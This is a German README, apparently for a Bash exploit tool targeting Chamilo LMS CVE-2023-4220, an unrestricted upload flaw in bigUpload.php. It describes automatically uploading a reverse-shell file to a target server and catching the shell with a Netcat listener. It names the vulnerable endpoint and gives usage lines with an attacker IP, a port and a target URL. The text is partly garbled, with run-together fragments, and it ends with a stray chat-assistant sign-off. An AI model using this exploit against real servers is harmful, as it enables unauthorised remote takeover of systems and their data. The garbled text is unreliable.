
Refurbish Chamilo LMS CVE-2023-4220 Exploit in Bash geschrieben
Dieses Skript nutzt eine Remote-Code-Execution-Schwachstelle (RCE) in Chamilo LMS Versionen ≤ v1.11.24 aus. Die Schwachstelle (CVE-2023-4220) existiert aufgrund einer uneingeschränkten Datei-Upload-Funktionalität in der bigUpload.php-Funktion von Chamilo LMS, die es Angreifern ermöglicht, beliebige Dateien (wie Web-Shells) hochzuladen und auszuführen, was zu einer vollständigen Remote-Code-Ausführung auf dem Server führt.
Dieses Skript wurde von Divine Clown verbessert, um den Ausnutzungsprozess zu optimieren. Es generiert automatisch eine Reverse-Shell-Datei, lädt sie auf das Ziel hoch und startet einen Listener, der dem Angreifer direkten Zugriff auf die Shell gewährt.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php-Endpunkt hoch../CVE-2023-4220.sh -i <angreifer_ip> -p <port> -h <host_link>
-i <angreifer_ip>: Die IP-Adresse des Angreifers für die Reverse-Shell.-p <port>: Der Port, auf dem der Netcat-Listener gestartet wird.-h <host_link>: Die vollständige URL der verwundbaren Chamilo-LMS-Instanz../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
Dieses Tool ist ausschließlich für Bildungszwecke und Testumgebungen bestimmt, in denen Sie ausdrücklich die Erlaubnis haben, Schwachstellen auszunutzen. Unbefugter Zugriff auf Systeme ist illegal und kann zu strafrechtlichen Konsequenzen führen. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.
Sie können die README gerne weiter anpassen, falls Sie zusätzliche Informationen oder Formatierungen einfügen möchten. Lassen Sie mich wissen, wenn Sie noch etwas benötigen.